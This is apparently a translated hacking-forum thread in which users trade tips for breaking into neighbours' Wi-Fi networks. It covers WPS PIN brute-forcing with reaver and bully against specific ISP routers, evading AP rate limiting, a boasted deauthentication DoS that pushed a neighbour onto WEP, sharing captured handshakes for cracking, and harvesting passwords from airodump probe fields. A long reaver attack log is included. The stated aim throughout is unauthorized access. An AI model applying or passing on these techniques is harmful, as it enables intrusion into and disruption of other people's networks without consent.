A couple of words about what I wrote above, or rather about the results :) Since the situation was hopeless, a prolonged DoS of the neighbor with deauth packets forced him to switch his protection to WEP :) So now I have both access and the PIN written down.
The AP is a TL-WR720N. I was brute-forcing WPS with reaver. After roughly ~500 attempts something strange started happening... After "Sending M2 message" a timeout appeared. Has the AP hung, or is this some kind of protection mechanism??? Would a reboot help?
Most likely the signal got weak and it errored out; save the session, at night the signal and reaver are usually better.
There's a router with BSSID SAGEMCOM_XXXX. WPS locks after 10 attempts and only unlocks after a reboot. Can I set a delay in reaver after 9 attempts? And how long should the delay be?
WARNING: Detected AP rate limiting, waiting 7205 seconds before re-checking

i7 3630QM, 8 GB RAM, Nvidia GT650M
Post your handshake here https://forum.antichat.ru/threads/417617/ or here https://forum.antichat.ru/threads/435763/ ... And don't forget to say thanks )))
Rostelecom has started installing ZTE ZXHN H118N routers with BSSID D4:76:EA... WPS is enabled, but when you try to brute-force it, it accepts the first half of the PIN whatever it is, and then rejects every attempt to guess the second half. It doesn't work even when brute-forcing sequentially without regard to the checksum digit. The Pixie attack doesn't work either. The AP is very close, the signal is excellent, the adapter is a TP-Link TL-WN7200ND that has been proven many times in the field, OS is Kali 2.0. Any thoughts? Has anyone run into this?
To start with, you'd need to catch a couple of handshakes from such routers and post them in the password-cracking thread; if they can be cracked, I think they'll turn out to have identical passwords as usual, Rostelecom has long been known for that. Then there'll be something to go on.
Or passwords generated by a known algorithm, like it was with the durdom.ru routers :) ZTE is leaky as hell.
Looks like they've released a new revision; that series of MAC addresses doesn't show up in Google or Shodan. Catching a handshake is problematic so far: in 4 days of the router being up, not a single connection. I get the feeling they simply don't know how to pair their smartphones with it...
Here's a fragment of the brute force. Strange that there are repeats, 45 at a time...

[+] p2_index set to 503
[+] Pin count advanced: 10503. Max pin attempts: 11000
[+] 95.48% complete. Elapsed time: 0d1h29m42s.
[+] Estimated Remaining time: 0d1h14m33s
[+] Trying pin 13414979.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[... the same request/response pair repeats many more times ...]
[P] E-Nonce: 6a:4c:3d:a7:7f:dc:82:cd:26:48:1a:40:33:2e:f7:e3
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: ZTE Corporation
[P] WPS Model Name: ZXHN H118N
[P] WPS Model Number: ZXHN H118N
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: c2:10:53:c9:9c:6d:35:60:0b:7d:21:e6:a5:0a:2b:41
[P] PKR: e6:a7:01:87:ad:02:1c:39:76:8d:93:24:fe:75:56:ae:60:b9:4a:40:61:84:a2:ec:58:97:25:41:9b:45:37:94:bf:92:55:bf:68:19:ab:db:8a:ff:4f:51:7d:84:a6:e6:62:b8:7d:6e:9d:85:84:d5:35:59:5a:88:42:7f:85:af:7f:93:f4:b3:4b:63:53:66:57:83:b4:0d:97:38:8e:c0:c4:04:c5:c5:ea:4a:d5:81:93:f9:62:e2:ab:58:9f:7b:47:3f:df:32:a7:db:cc:d1:6e:f4:47:84:3b:55:b6:88:9f:39:17:34:b0:b0:e2:88:7d:0f:b9:a6:a4:c3:25:5c:73:98:c4:44:0f:80:fd:43:38:04:89:3c:e1:d0:22:b8:9f:52:05:c6:c9:b7:27:71:58:45:d9:3b:ea:37:58:66:60:0f:0b:48:09:64:6b:78:50:2d:91:10:0d:71:a0:ae:80:90:79:d0:4f:e9:b7:30:8c:1b:cc:de:a8:f3:47:c1
[P] AuthKey: 0b:41:30:67:63:e8:73:b9:2f:16:bd:fb:ad:bd:ac:37:f7:5f:7b:00:53:7a:92:81:27:59:15:13:ca:df:54:56
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[... "Received M1 message" repeats many more times ...]
[P] E-Hash1: f1:3c:1c:00:dc:08:cc:91:3e:e9:e5:14:e4:28:ea:11:94:5b:07:80:96:12:2e:74:47:0e:31:65:b6:42:39:6c
[P] E-Hash2: f1:3c:1c:00:dc:08:cc:91:3e:e9:e5:14:e4:28:ea:11:94:5b:07:80:96:12:2e:74:47:0e:31:65:b6:42:39:6c
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[... "Received M3 message" repeats many more times ...]
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[... "Received M5 message" repeats many more times ...]
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK

Rostelecom here has taken to setting 12-digit numeric passwords. I'd be brute-forcing that on my old clunker for a month.
It doesn't accept the first half of the PIN; it terminates the EAPOL session incorrectly, and reaver thinks the first half succeeded. And it can't find the second half, because the first half is wrong too.
So what do you suggest? How do I get into it? I think I've already tried every key option. Maybe play with the delays? Bully doesn't take it at all, it spins the same PIN endlessly...
A control pass over the APs already cracked confirms that the adapter works as it should. Other details have turned up: airodump detected WPS version 1.0 PBC, that is, WPS started by push button. Maybe that's why the reaver attack is unsuccessful?
During prolonged airodump runs I noticed by chance that sometimes the coveted password flashes by in the "Probe" field! It looks like someone enters it as the name of their device. Three of those have turned up already... So you just run airodump and listen to the air. Then you carefully study the associations between clients and APs and try the password; it usually stands out against plain AP and device names.